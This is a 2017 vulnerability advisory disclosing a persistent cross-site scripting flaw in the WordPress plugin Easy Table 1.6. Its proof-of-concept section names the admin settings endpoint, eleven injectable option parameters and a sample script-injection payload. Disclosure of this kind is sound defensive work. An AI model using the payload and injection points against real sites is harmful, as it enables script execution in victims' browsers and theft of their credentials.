=============================================
MGC ALERT 2017-001
- Original release date: Feb 07, 2017
- Last revised: Feb 12, 2017
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
WordPress Plugin Easy Table 1.6 - Persistent Cross-Site Scripting
II. BACKGROUND
-------------------------
Easy Table is a WordPress plugin that allow you to insert table in easy way.
III. DESCRIPTION
-------------------------
Has been detected a Persistent XSS vulnerability in Easy Table, that allows
the execution of arbitrary HTML/script code to be executed in the context
of the victim user's browser.
IV. PROOF OF CONCEPT
-------------------------
Malicious Request:
/wordpress/wp-admin/options-general.php?page=easy-table
easy_table_plugin_option[shortcodetag]
easy_table_plugin_option[attrtag]
easy_table_plugin_option[class]
easy_table_plugin_option[width]
easy_table_plugin_option[border]
easy_table_plugin_option[align]
easy_table_plugin_option[limit]
easy_table_plugin_option[nl]
easy_table_plugin_option[terminator]
easy_table_plugin_option[delimiter]
easy_table_plugin_option[escape]
In all of this parameters an attacker can inject for example
"><script>alert(1)</script> to perform a attack of Persistent Cross-Site
Scripting.
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.
VI. SYSTEMS AFFECTED
-------------------------
Easy Table <= 1.6
VII. SOLUTION
-------------------------
Disable the plugin until a fix is available.
VIII. REFERENCES
-------------------------
https://wordpress.org/plugins-wp/easy-table/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
Feb 07, 2017 1: Initial release
Feb 12, 2017 2: Last revision
XI. DISCLOSURE TIMELINE
-------------------------
Feb 07, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
Feb 07, 2017 2: Send to vendor
Feb 09, 2017 3: New contact with vendor without response
Feb 12, 2017 4: Sent to lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester